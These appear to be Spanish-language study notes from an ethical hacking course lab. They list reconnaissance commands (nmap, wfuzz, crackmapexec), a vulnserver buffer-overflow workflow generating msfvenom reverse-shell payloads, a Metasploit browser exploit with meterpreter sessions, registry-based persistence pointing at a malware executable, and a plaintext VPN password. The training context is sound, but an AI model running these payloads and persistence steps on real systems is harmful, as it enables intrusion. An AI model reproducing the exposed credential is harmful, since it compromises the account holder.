HACKING ÉTICO
2023-09-02 08:07:04

*********************************************************************************************************
metaexploit
2023-09-27 14:14:14

use auxiliary/scanner/portscan/tcp

use auxiliary/scanner/discovery/arp_sweep
set rhosts 192.168.1.1-192.168.254.254


*********************************************************************************************************

*********************************************************************************************************
Comandos
2023-09-23 09:52:31

whatweb -v -a 3 http://192.168.120.58

crackmapexec smb  192.168.120.58 

nmap -p-  -T4 -sV  --open 192.168.120.58 --min-rate=1000

*********************************************************************************************************

*********************************************************************************************************
17-09-2023
2023-09-17 11:46:46

-msf-pattern_create -l 2100
-msf-pattern_offset -q 386F4337 ->es el valor de EIP que se puso en el anterior
-EIP permite saber el registro de instruccion de siguiente salto

+msfvenom -p windows/shell_reverse_tcp lhost=10.200.0.11 lport=443 -a x86 --plataform windows -f c
-!mona config -set workingfolder C:\Users\Test\Desktop\vulnserver\%p

-!mona bytearray

-!mona compare -f  C:\Users\Test\Desktop\vulnserver\vulnserver\bytearray.bin -a 018AF9E0 ->esp

-!mona bytearray -cpb "\x00"
-!mona modules
+--(kali?kali)-[~]
+-$ msf-nasm_shell
nasm > jump esp
/tmp/nasmXXXX20230917-118572-j561hu:2: error: parser: instruction expected
Error: Assembler did not complete successfully: 1
nasm > jmp esp
00000000  FFE4              jmp esp
nasm > 
-formato->FFE4 >"\xff\xe4"
-!mona find -s "\xff\xe4" -m essfunc.dll
-msfvenom -p windows/shell_reverse_tcp LHOST=10.200.0.11 LPORT=443 -a x86 -b "\x00" exifunc=thread --platform windows -f c

*********************************************************************************************************

*********************************************************************************************************
probar
2023-09-17 07:57:41

dotdotpwn -m http-url -u http://192.168.120.87/site/TRAVERSAL -k "root:"


*********************************************************************************************************

*********************************************************************************************************
eplotacion de binarios
2023-09-16 15:22:52

Pasos:

*********************************************************************************************************

*********************************************************************************************************
privilegios
2023-09-16 15:03:41

comprometer


*********************************************************************************************************

*********************************************************************************************************
metaexploit browser
2023-09-16 09:05:06

msfconsole
-use exploit/Windows/browser/ms11_003_ie_css_import 
-set payload windows/meterpreter/reverse_tcp 
-show options 
-set srvhost tun0 
-set srvport 80 
-set uripath / 
-set lhost tun0
-set lport  443
-exploit -j
-jobs
-sessions -i 2 "o cual sea"
   -pwd
   -sysinfo
   -ps
   - run post/windows/manage/persistence_exe
   -help run exploit/windows/local/persistence
help use exploit/windows/local/persistence
   -background
   -use  post/windows/manage/persistence_exe
   -show options
-show options advanced
   -set REXEPATCH C:\\Windows\\
   -set session 9
   -check
   -run

En windows
-netstat -ano | findstr ESTABLISHED
-reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ (BUSCAR)
-reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -v HYFGDVDDF -d C:\\Windows\\malware.exe
-reg queryval -k HCKU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -v
-getprivs
-ps -A x64 -> lista procesos solo x64
-set exitonsession false

*********************************************************************************************************

*********************************************************************************************************
piivoting
2023-09-16 08:17:40

investigar que es

*********************************************************************************************************

*********************************************************************************************************
Tomar encunta
2023-09-15 08:48:31

indetificar componentes,verificacion de tacks o rutas
-codigo fuente de la pagina
https://target/robots.txt
https://target/post-sitemap.xml
wget https:target/pagina


*********************************************************************************************************

*********************************************************************************************************
actulizar con python
2023-09-10 08:59:23

python2 windows-exploit-suggester.py --update
impacket-smbserver smb $(pwd) -smb2support -username luis -password 1234

*********************************************************************************************************

*********************************************************************************************************
Nmap
2023-09-09 14:10:44

nmap 192.168.120.6
nmap -F 192.168.120.6
nmap -p 80,8080,443,8081  -T4 -sV  --open 192.168.120.0/24 --min-rate=1000
crackmapexec smb  192.168.120.150
nmap 192.168.120.0/24 -sP
grep -r "categories" /usr/share/nmap/scripts/*.nse | grep -oP '".*?"' | sort -u
grep -r "categories" /usr/share/nmap/scripts/*.nse | grep malware | wc -l
nmap 192.168.120.6 -p 80 --script=http-enum.nse 

*********************************************************************************************************

*********************************************************************************************************
ver puertos
2023-09-09 12:42:57

nc -nvv -w 1 -z 192.168.120.6 80-300
nc -nv -u -w 1 -z 192.168.120.6 53-54
hping3 -1 192.168.120.6
hping3 -S 192.168.120.6 
hping3 -S 192.168.120.6 -p 80 -c 1
hping3 -A 192.168.120.6 -p 81 -c 1

*********************************************************************************************************

*********************************************************************************************************
vulnerabilidades
2023-09-09 12:09:24

searchsploit mikrotik

*********************************************************************************************************

*********************************************************************************************************
wfuzz
2023-09-09 11:52:02

wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -t 30 --hc=404 http://192.168.120.6/FUZZ

*********************************************************************************************************

*********************************************************************************************************
verificación
2023-09-09 11:46:12

htaccess

https://osintframework.com/

*********************************************************************************************************

*********************************************************************************************************
Entrada PTR
2023-09-03 11:29:38

for ip in $(seq 255 -1 1); do
  result=$(host 200.9.96.$ip)
  if [[ "$result" != *"not found"* ]]; then
    echo "$result"
  fi
done


*********************************************************************************************************

*********************************************************************************************************
log 4623 tipo 3
2023-09-03 08:44:49

en sien es un log tipo de red es decir por red

*********************************************************************************************************

*********************************************************************************************************
acceder a un sitio
2023-09-03 08:27:32

ssh -l admin 192.168.120.50 -oHostKeyAlgorithms=+ssh-rsa,ssh-dss
web
telnet 
winbox


*********************************************************************************************************

*********************************************************************************************************
usar
2023-09-02 12:52:03

DAST
SAST

*********************************************************************************************************

*********************************************************************************************************
conexion de red vpn
2023-09-02 09:55:19

comandos:
-sudo su
-mv * /etc/openvpn

-cd /etc/openvpn
-openvpn pucesa0923_dataprotect.ovpn

Credentials:
pucesa0923
C6LdVm37$J0Zyh2

*********************************************************************************************************

*********************************************************************************************************
puerto winbox
2023-09-02 09:39:46

8291

*********************************************************************************************************

*********************************************************************************************************
paginas a visitar
2023-09-02 09:39:01

Shodan monitor


*********************************************************************************************************

*********************************************************************************************************
ACCESO VPN
2023-09-02 09:04:10

wiki: https://192.168.120.99/pucesa/

-laboratorios gestionados por docker

-credenciales VPN provisto por el instructor:archivo rar con la configuración

*********************************************************************************************************

*********************************************************************************************************
Tomar encuenta
2023-09-02 08:46:17

-informes solidos y no refutables.
-cva ida asignado en programas.
-diferencia de herramientas de vulnerabilidades automatizada vs a mano
-trabajo con malware.
-entender y el funcionamiento de una vulnerabilidad


*********************************************************************************************************
